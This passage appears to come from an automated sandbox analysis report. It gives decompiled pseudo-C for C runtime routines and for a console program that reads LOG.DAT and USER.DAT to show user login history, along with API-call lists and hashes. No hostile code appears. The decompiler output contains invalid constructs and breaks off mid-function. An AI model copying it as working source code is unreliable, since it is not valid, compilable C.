                                                									_v8 = _t76;
                                                									_t92[1] = _t92[6] - 1;
                                                									__eflags = _t76;
                                                									if(__eflags <= 0) {
                                                										__eflags = _t89 - 0xffffffff;
                                                										if(_t89 == 0xffffffff) {
                                                											L22:
                                                											_t77 = 0x1251390;
                                                										} else {
                                                											__eflags = _t89 - 0xfffffffe;
                                                											if(_t89 == 0xfffffffe) {
                                                												goto L22;
                                                											} else {
                                                												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1252f60 + (_t89 >> 5) * 4));
                                                											}
                                                										}
                                                										__eflags =  *(_t77 + 4) & 0x00000020;
                                                										if(__eflags == 0) {
                                                											goto L25;
                                                										} else {
                                                											_push(2);
                                                											_push(_t70);
                                                											_push(_t70);
                                                											_push(_t89);
                                                											_t45 = E012417B4(_t70, _t89, _t92, __eflags) & _t87;
                                                											__eflags = _t45 - 0xffffffff;
                                                											if(_t45 == 0xffffffff) {
                                                												goto L28;
                                                											} else {
                                                												goto L25;
                                                											}
                                                										}
                                                									} else {
                                                										_push(_t76);
                                                										_push(_t87);
                                                										_push(_t89);
                                                										_t70 = E01240343(_t70, _t87, _t89, _t92, __eflags);
                                                										L25:
                                                										_t45 = _a4;
                                                										 *(_t92[2]) = _t45;
                                                										L27:
                                                										__eflags = _t70 - _v8;
                                                										if(_t70 == _v8) {
                                                											_t52 = _a4 & 0x000000ff;
                                                										} else {
                                                											L28:
                                                											_t40 =  &(_t92[3]);
                                                											 *_t40 = _t92[3] | 0x00000020;
                                                											__eflags =  *_t40;
                                                											goto L29;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								_t92[1] = 0;
                                                								__eflags = _t74 & 0x00000010;
                                                								if((_t74 & 0x00000010) == 0) {
                                                									_t92[3] = _t74 | 0x00000020;
                                                									L29:
                                                									_t52 = _t45 | 0xffffffff;
                                                								} else {
                                                									_t85 = _t74 & 0xfffffffe;
                                                									__eflags = _t85;
                                                									 *_t92 = _t92[2];
                                                									_t92[3] = _t85;
                                                									goto L10;
                                                								}
                                                							}
                                                						} else {
                                                							_t67 = E01238EFF(__eflags);
                                                							 *_t67 = 0x22;
                                                							goto L6;
                                                						}
                                                					} else {
                                                						_t67 = E01238EFF(__eflags);
                                                						 *_t67 = 9;
                                                						L6:
                                                						_t92[3] = _t92[3] | 0x00000020;
                                                						_t52 = _t67 | 0xffffffff;
                                                					}
                                                					return _t52;
                                                				} else {
                                                					return _t44 | 0xffffffff;
                                                				}
                                                			}


























                                                0x0123bb70
                                                0x0123bb77
                                                0x0123bb7f
                                                0x0123bb84
                                                0x0123bb8a
                                                0x0123bb8d
                                                0x0123bb8f
                                                0x0123bb92
                                                0x0123bba1
                                                0x0123bba4
                                                0x0123bbbe
                                                0x0123bbc0
                                                0x0123bbc3
                                                0x0123bbd8
                                                0x0123bbde
                                                0x0123bbe1
                                                0x0123bbe4
                                                0x0123bbe7
                                                0x0123bbec
                                                0x0123bbee
                                                0x0123bbf6
                                                0x0123bbf8
                                                0x0123bc06
                                                0x0123bc07
                                                0x0123bc0d
                                                0x0123bc0f
                                                0x00000000
                                                0x00000000
                                                0x0123bbfa
                                                0x0123bbfa
                                                0x0123bc02
                                                0x0123bc04
                                                0x0123bc11
                                                0x0123bc12
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123bc04
                                                0x0123bbf8
                                                0x0123bc18
                                                0x0123bc1f
                                                0x0123bc9d
                                                0x0123bc9e
                                                0x0123bc9f
                                                0x0123bca5
                                                0x0123bca6
                                                0x0123bca7
                                                0x0123bcaf
                                                0x00000000
                                                0x0123bc21
                                                0x0123bc21
                                                0x0123bc26
                                                0x0123bc29
                                                0x0123bc2e
                                                0x0123bc31
                                                0x0123bc34
                                                0x0123bc37
                                                0x0123bc39
                                                0x0123bc52
                                                0x0123bc55
                                                0x0123bc72
                                                0x0123bc72
                                                0x0123bc57
                                                0x0123bc57
                                                0x0123bc5a
                                                0x00000000
                                                0x0123bc5c
                                                0x0123bc69
                                                0x0123bc69
                                                0x0123bc5a
                                                0x0123bc77
                                                0x0123bc7b
                                                0x00000000
                                                0x0123bc7d
                                                0x0123bc7d
                                                0x0123bc7f
                                                0x0123bc80
                                                0x0123bc81
                                                0x0123bc87
                                                0x0123bc8c
                                                0x0123bc8f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123bc8f
                                                0x0123bc3b
                                                0x0123bc3b
                                                0x0123bc3c
                                                0x0123bc3d
                                                0x0123bc46
                                                0x0123bc91
                                                0x0123bc94
                                                0x0123bc97
                                                0x0123bcb1
                                                0x0123bcb1
                                                0x0123bcb4
                                                0x0123bcbf
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x0123bcb6
                                                0x00000000
                                                0x0123bcb6
                                                0x0123bcb4
                                                0x0123bc39
                                                0x0123bbc5
                                                0x0123bbc5
                                                0x0123bbc8
                                                0x0123bbcb
                                                0x0123bc4d
                                                0x0123bcba
                                                0x0123bcba
                                                0x0123bbcd
                                                0x0123bbd0
                                                0x0123bbd0
                                                0x0123bbd3
                                                0x0123bbd5
                                                0x00000000
                                                0x0123bbd5
                                                0x0123bbcb
                                                0x0123bba6
                                                0x0123bba6
                                                0x0123bbab
                                                0x00000000
                                                0x0123bbab
                                                0x0123bb94
                                                0x0123bb94
                                                0x0123bb99
                                                0x0123bbb1
                                                0x0123bbb1
                                                0x0123bbb5
                                                0x0123bbb5
                                                0x0123bcc7
                                                0x0123bb79
                                                0x0123bb7d
                                                0x0123bb7d

                                                APIs
                                                • __ioinit.LIBCMT ref: 0123BB70
                                                  • Part of subcall function 0123A5A7: InitOnceExecuteOnce.KERNEL32(0125229C,0123A5E2,00000000,00000000,01241205,?,?,01239886,00000000,?,?,?,012371AD,-00000020,0124D7B8,0000000C), ref: 0123A5B5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Once$ExecuteInit__ioinit
                                                • String ID:
                                                • API String ID: 129814473-0
                                                • Opcode ID: a3723833a784d0035029f83ddb1f748b61901b88de0fd0e471294b3ec6791ab2
                                                • Instruction ID: 5002ab42a2ee48422dd7b6de1c71efbd61ffdde899e9908cdbb34c2abc2d7ea0
                                                • Opcode Fuzzy Hash: a3723833a784d0035029f83ddb1f748b61901b88de0fd0e471294b3ec6791ab2
                                                • Instruction Fuzzy Hash: E141F5F16307029FE7399F2CC891A7A7BA49FD5320B048B1DE6A6876D1EB74D4408B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E01241D26(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                				void* _t7;
                                                				long _t8;
                                                				intOrPtr* _t9;
                                                				intOrPtr* _t12;
                                                				long _t20;
                                                				long _t31;
                                                
                                                				if(_a4 != 0) {
                                                					_t31 = _a8;
                                                					__eflags = _t31;
                                                					if(_t31 != 0) {
                                                						_push(__ebx);
                                                						while(1) {
                                                							__eflags = _t31 - 0xffffffe0;
                                                							if(_t31 > 0xffffffe0) {
                                                								break;
                                                							}
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								_t31 = _t31 + 1;
                                                								__eflags = _t31;
                                                							}
                                                							_t7 = HeapReAlloc( *0x1252a68, 0, _a4, _t31);
                                                							_t20 = _t7;
                                                							__eflags = _t20;
                                                							if(_t20 != 0) {
                                                								L17:
                                                								_t8 = _t20;
                                                							} else {
                                                								__eflags =  *0x1252a64 - _t7;
                                                								if(__eflags == 0) {
                                                									_t9 = E01238EFF(__eflags);
                                                									 *_t9 = E01238F12(GetLastError());
                                                									goto L17;
                                                								} else {
                                                									__eflags = E0123C6EE(_t7, _t31);
                                                									if(__eflags == 0) {
                                                										_t12 = E01238EFF(__eflags);
                                                										 *_t12 = E01238F12(GetLastError());
                                                										L12:
                                                										_t8 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										continue;
                                                									}
                                                								}
                                                							}
                                                							goto L14;
                                                						}
                                                						E0123C6EE(_t6, _t31);
                                                						 *((intOrPtr*)(E01238EFF(__eflags))) = 0xc;
                                                						goto L12;
                                                					} else {
                                                						E01238F53(_a4);
                                                						_t8 = 0;
                                                					}
                                                					L14:
                                                					return _t8;
                                                				} else {
                                                					return E012377C5(__ebx, __edx, __edi, _a8);
                                                				}
                                                			}









                                                0x01241d2d
                                                0x01241d3b
                                                0x01241d3e
                                                0x01241d40
                                                0x01241d4f
                                                0x01241d82
                                                0x01241d82
                                                0x01241d85
                                                0x00000000
                                                0x00000000
                                                0x01241d52
                                                0x01241d54
                                                0x01241d56
                                                0x01241d56
                                                0x01241d56
                                                0x01241d63
                                                0x01241d69
                                                0x01241d6b
                                                0x01241d6d
                                                0x01241dcd
                                                0x01241dcd
                                                0x01241d6f
                                                0x01241d6f
                                                0x01241d75
                                                0x01241db7
                                                0x01241dcb
                                                0x00000000
                                                0x01241d77
                                                0x01241d7e
                                                0x01241d80
                                                0x01241d9f
                                                0x01241db3
                                                0x01241d99
                                                0x01241d99
                                                0x01241d99
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01241d80
                                                0x01241d75
                                                0x00000000
                                                0x01241d9b
                                                0x01241d88
                                                0x01241d93
                                                0x00000000
                                                0x01241d42
                                                0x01241d45
                                                0x01241d4b
                                                0x01241d4b
                                                0x01241d9c
                                                0x01241d9e
                                                0x01241d2f
                                                0x01241d39
                                                0x01241d39

                                                APIs
                                                • _malloc.LIBCMT ref: 01241D32
                                                  • Part of subcall function 012377C5: __FF_MSGBANNER.LIBCMT ref: 012377DC
                                                  • Part of subcall function 012377C5: __NMSG_WRITE.LIBCMT ref: 012377E3
                                                  • Part of subcall function 012377C5: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,0123C5BB,00000000,00000000,00000000,00000000,?,0123BF28,00000018,0124D900), ref: 01237808
                                                • _free.LIBCMT ref: 01241D45
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AllocHeap_free_malloc
                                                • String ID:
                                                • API String ID: 2734353464-0
                                                • Opcode ID: ccd8d4a5751def43bb8f633174a4947b5e6fe562f416e8501ce2be29bf67c11a
                                                • Instruction ID: b533630e41595dafc76d5075909c6c6ece6ac824fed1725904b7007a5323c064
                                                • Opcode Fuzzy Hash: ccd8d4a5751def43bb8f633174a4947b5e6fe562f416e8501ce2be29bf67c11a
                                                • Instruction Fuzzy Hash: 9C11C6F2534313EFDB393FB8A8046793B999F50260F104525FA89DA194DF34E4E09794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0123860D
                                                  • Part of subcall function 0123E840: __87except.LIBCMT ref: 0123E87B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 94d0458ce56f14d9088ef7cda2fbcca6fd90b181e8a223b371e88f0592ba9811
                                                • Instruction ID: 619fe3fc2942727e06a91cd8c2fe1a6dcd52868b57d6946b70352e4a71a8e7f7
                                                • Opcode Fuzzy Hash: 94d0458ce56f14d9088ef7cda2fbcca6fd90b181e8a223b371e88f0592ba9811
                                                • Instruction Fuzzy Hash: 53516BE0A39203CADB127B1CD94137E2F94EBC0710F118E69F2D54A2EDEB75C4989B46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0123347B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				intOrPtr _t218;
                                                				void* _t228;
                                                				void* _t249;
                                                				void* _t270;
                                                				void* _t283;
                                                				void* _t287;
                                                				void* _t306;
                                                				intOrPtr _t307;
                                                				void* _t309;
                                                				intOrPtr _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				intOrPtr _t320;
                                                				void* _t336;
                                                				intOrPtr _t364;
                                                				void* _t371;
                                                				intOrPtr _t394;
                                                				void* _t397;
                                                				void* _t421;
                                                				void* _t433;
                                                				void* _t435;
                                                				void* _t436;
                                                				void* _t437;
                                                				void* _t442;
                                                				void* _t443;
                                                				void* _t446;
                                                				void* _t448;
                                                				void* _t450;
                                                				void* _t451;
                                                				void* _t457;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t457 = __fp0;
                                                					_t421 = __esi;
                                                					_t397 = __edi;
                                                					_t314 = __ebx;
                                                					 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
                                                					while(1) {
                                                						L69:
                                                						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                						if(__eflags < 0) {
                                                						}
                                                						L70:
                                                						E012312B0(5,  *(_t433 - 0xc) + 0xa);
                                                						_push(1 +  *(_t433 - 8));
                                                						_push("%d.");
                                                						E0123715C(_t314, _t397, _t421, __eflags);
                                                						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
                                                						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
                                                						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                						_t270 = E012382C0( *((intOrPtr*)(_t433 - 0x10)) + _t181);
                                                						_t448 = _t435 + 0xc;
                                                						__eflags = _t270 - 0xa;
                                                						if(__eflags < 0) {
                                                							_t336 =  *(_t433 - 8) * 0x45;
                                                							__eflags = _t336;
                                                							_t185 = _t336 + 0x22; // 0x23
                                                							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
                                                							E012316A0(_t397, _t421, _t457);
                                                						}
                                                						L72:
                                                						E012312B0(9,  *(_t433 - 0xc) + 0xa);
                                                						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
                                                						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
                                                						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
                                                						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
                                                						_push("%s\t\t%s\t%s\t\t%s");
                                                						E0123715C(_t314, _t397, _t421, __eflags);
                                                						_t435 = _t448 + 0x14;
                                                						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
                                                						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
                                                							L74:
                                                							goto L0;
                                                						} else {
                                                							L73:
                                                							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
                                                						}
                                                						L75:
                                                						_t322 =  *((char*)(_t433 - 1));
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                						if( *((char*)(_t433 - 1)) == 0x53) {
                                                							L77:
                                                							 *(_t433 - 0x34) = 1;
                                                						} else {
                                                							L76:
                                                							__eflags =  *((char*)(_t433 - 1)) - 0x73;
                                                							if( *((char*)(_t433 - 1)) == 0x73) {
                                                								goto L77;
                                                							}
                                                						}
                                                						L78:
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                						if( *((char*)(_t433 - 1)) == 0x20) {
                                                							_t322 =  *(_t433 - 8);
                                                							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
                                                								 *(_t433 - 0x1c) = 0;
                                                							}
                                                						}
                                                						L81:
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                						if(__eflags == 0) {
                                                							L50:
                                                							E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                							__eflags =  *(_t433 - 0x14) - 0xc;
                                                							if(__eflags >= 0) {
                                                								E012312B0(0xf, 0x15);
                                                								_push("Press SPACE BAR to view more data");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t446 = _t435 + 4;
                                                							} else {
                                                								E012312B0(8, 0x15);
                                                								_push("Press S to toggle Sorting between ascending or descending order.");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t446 = _t435 + 4;
                                                							}
                                                							L53:
                                                							E012312B0(5, 8);
                                                							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t435 = _t446 + 4;
                                                							E012312B0(4, 9);
                                                							 *(_t433 - 8) = 0;
                                                							while(1) {
                                                								L55:
                                                								__eflags =  *(_t433 - 8) - 0x46;
                                                								if(__eflags >= 0) {
                                                									break;
                                                								}
                                                								L56:
                                                								_push(0xc4);
                                                								_push("%c");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t435 = _t435 + 8;
                                                								L54:
                                                								_t287 = 1 +  *(_t433 - 8);
                                                								__eflags = _t287;
                                                								 *(_t433 - 8) = _t287;
                                                							}
                                                							L57:
                                                							__eflags =  *(_t433 - 0x34);
                                                							if( *(_t433 - 0x34) != 0) {
                                                								L58:
                                                								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
                                                								while(1) {
                                                									L60:
                                                									__eflags =  *(_t433 - 8);
                                                									if( *(_t433 - 8) < 0) {
                                                										break;
                                                									}
                                                									L61:
                                                									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                									_t435 = _t435 + 0xc;
                                                									_t397 = _t421 + 0x22;
                                                									asm("movsb");
                                                									L59:
                                                									_t371 =  *(_t433 - 8) - 1;
                                                									__eflags = _t371;
                                                									 *(_t433 - 8) = _t371;
                                                								}
                                                								L62:
                                                								 *(_t433 - 8) = 0;
                                                								while(1) {
                                                									L64:
                                                									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                										goto L66;
                                                									}
                                                									L65:
                                                									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                									_t435 = _t435 + 0xc;
                                                									_t397 = _t421 + 0x22;
                                                									asm("movsb");
                                                									L63:
                                                									_t283 = 1 +  *(_t433 - 8);
                                                									__eflags = _t283;
                                                									 *(_t433 - 8) = _t283;
                                                								}
                                                							}
                                                							L66:
                                                							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
                                                							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
                                                								 *(_t433 - 0x1c) = 0;
                                                							}
                                                							L68:
                                                							 *(_t433 - 8) =  *(_t433 - 0x1c);
                                                							 *(_t433 - 0xc) = 0;
                                                							L69:
                                                							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                							if(__eflags < 0) {
                                                							}
                                                							goto L75;
                                                						}
                                                						L82:
                                                						_t249 =  *((char*)(_t433 - 1));
                                                						__eflags = _t249 - 0x73;
                                                						if(__eflags == 0) {
                                                							goto L50;
                                                						}
                                                						L83:
                                                						_t322 =  *((char*)(_t433 - 1));
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                						if(__eflags == 0) {
                                                							goto L50;
                                                						}
                                                						L84:
                                                						while(1) {
                                                							L86:
                                                							__eflags = 1;
                                                							if(1 == 0) {
                                                								break;
                                                							}
                                                							L1:
                                                							 *(_t433 - 8) = 0;
                                                							 *(_t433 - 0x28) = 0;
                                                							 *(_t433 - 0x1c) = 0;
                                                							 *(_t433 - 0x34) = 0;
                                                							_t218 = E01236EF1("LOG.DAT", "r");
                                                							_t436 = _t435 + 8;
                                                							 *0x1252f20 = _t218;
                                                							while(1) {
                                                								L2:
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
                                                								_t320 =  *0x1252f20; // 0x0
                                                								_t228 = E01237021(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
                                                								_t437 = _t436 + 0x18;
                                                								if(_t228 == 0xffffffff) {
                                                									break;
                                                								}
                                                								L3:
                                                								_t307 = E01236EF1("USER.DAT", "r");
                                                								_t450 = _t437 + 8;
                                                								 *0x1252f28 = _t307;
                                                								while(1) {
                                                									L4:
                                                									_push(_t433 - 0x78);
                                                									_push(_t433 - 0x58);
                                                									_t394 =  *0x1252f28; // 0x0
                                                									_t309 = E01237021(_t394, "%s %s %s\n", _t433 - 0x38);
                                                									_t451 = _t450 + 0x14;
                                                									if(_t309 == 0xffffffff) {
                                                										break;
                                                									}
                                                									L5:
                                                									_t313 = E01238230( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
                                                									_t450 = _t451 + 8;
                                                									if(_t313 == 0) {
                                                										 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                									}
                                                								}
                                                								L8:
                                                								_t310 =  *0x1252f28; // 0x0
                                                								_push(_t310);
                                                								E01236DB6(_t314, _t397, _t421, __eflags);
                                                								_t436 = _t451 + 4;
                                                							}
                                                							L9:
                                                							 *(_t433 - 0x30) =  *(_t433 - 8);
                                                							_t364 =  *0x1252f20; // 0x0
                                                							_push(_t364);
                                                							E01236DB6(_t314, _t397, _t421, __eflags);
                                                							E012320E0( *(_t433 - 8), _t397, _t421, __eflags, _t457);
                                                							E012312B0(0x1e, 8);
                                                							_push("1. View by USER NAME");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xa);
                                                							_push("2. View by DATE");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xc);
                                                							_push("3. View ALL User history");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xe);
                                                							_push("4. Return to main menu");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t442 = _t437 + 0x14;
                                                							E012312B0(1, 0xf);
                                                							 *(_t433 - 8) = 0;
                                                							while(1) {
                                                								L11:
                                                								__eflags =  *(_t433 - 8) - 0x4e;
                                                								if(__eflags >= 0) {
                                                									break;
                                                								}
                                                								L12:
                                                								_push("_");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t442 = _t442 + 4;
                                                								_t306 = 1 +  *(_t433 - 8);
                                                								__eflags = _t306;
                                                								 *(_t433 - 8) = _t306;
                                                							}
                                                							L13:
                                                							E012312B0(0x17, 0x11);
                                                							_push(" Press a number between the range [1 -4]  ");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t443 = _t442 + 4;
                                                							 *(_t433 - 0xc) = 0;
                                                							_t322 =  *(_t433 - 0xc);
                                                							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
                                                							E012320E0( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
                                                							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
                                                							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
                                                							__eflags =  *(_t433 - 0x20) - 3;
                                                							if(__eflags > 0) {
                                                								L38:
                                                								E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                								E012312B0(0xa, 0xa);
                                                								_push("Your input is out of range! Enter a choice between 1 to 4!");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								E012312B0(0xf, 0xc);
                                                								_push("Press ENTER to return to main menu...");
                                                								_t249 = E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t435 = _t443 + 8;
                                                								 *(_t433 - 0x28) = 1;
                                                								goto L39;
                                                							} else {
                                                								L14:
                                                								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M012335F8))) {
                                                									case 0:
                                                										L15:
                                                										E012312B0(0x1e, 0xa);
                                                										_push("Enter user name : ");
                                                										E0123715C(_t314, _t397, _t421, __eflags);
                                                										_t365 = _t433 - 0x58;
                                                										_t249 = E0123738B(" %s", _t433 - 0x58);
                                                										_t435 = _t443 + 0xc;
                                                										 *(_t433 - 8) = 0;
                                                										while(1) {
                                                											L17:
                                                											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
                                                											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
                                                												break;
                                                											}
                                                											L18:
                                                											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
                                                											_t299 = E01238230( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
                                                											_t435 = _t435 + 8;
                                                											__eflags = _t299;
                                                											if(_t299 == 0) {
                                                												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
                                                												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												_t303 = 1 +  *(_t433 - 0xc);
                                                												__eflags = _t303;
                                                												 *(_t433 - 0xc) = _t303;
                                                											}
                                                											_t249 = 1 +  *(_t433 - 8);
                                                											__eflags = _t249;
                                                											 *(_t433 - 8) = _t249;
                                                										}
                                                										L21:
                                                										_t322 =  *(_t433 - 0xc);
                                                										 *(_t433 - 0x14) =  *(_t433 - 0xc);
                                                										goto L39;
                                                									case 1:
                                                										do {
                                                											L22:
                                                											__eax = E012312B0(0x1e, 0xa);
                                                											_push("Enter Date (dd/mm/yyyy) : ");
                                                											__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                											__esp = __esp + 4;
                                                											__edx = __ebp - 0x58;
                                                											E0123738B(" %s", __ebp - 0x58) = __ebp - 0x58;
                                                											__eflags = E01231E60(__eflags, __ebp - 0x58);
                                                											if(__eflags == 0) {
                                                												__eax = E01231500(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
                                                												_push(0x124f8b0);
                                                												__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                												__esp = __esp + 4;
                                                											}
                                                											__ecx = __ebp - 0x58;
                                                											__eflags = E01231E60(__eflags, __ebp - 0x58);
                                                										} while (__eflags == 0);
                                                										__edx = __ebp - 0x58;
                                                										_push(__ebp - 0x58);
                                                										__eax = E012315D0();
                                                										 *(__ebp - 8) = 0;
                                                										 *(__ebp - 0xc) = 0;
                                                										while(1) {
                                                											L27:
                                                											__ecx =  *(__ebp - 8);
                                                											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                												break;
                                                											}
                                                											L28:
                                                											__edx = __ebp - 0x58;
                                                											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                											__ecx =  *(__ebp - 0x18);
                                                											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
                                                											__eax = E01238230( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
                                                											__eflags = __eax;
                                                											if(__eax == 0) {
                                                												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                												__ecx = 0x11;
                                                												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                												__edi = __esi + __ecx;
                                                												__edi = __esi + __ecx + __ecx;
                                                												__ecx = 0;
                                                												asm("movsb");
                                                												__eax =  *(__ebp - 0xc);
                                                												__eax = 1 +  *(__ebp - 0xc);
                                                												__eflags = __eax;
                                                												 *(__ebp - 0xc) = __eax;
                                                											}
                                                											__eax =  *(__ebp - 8);
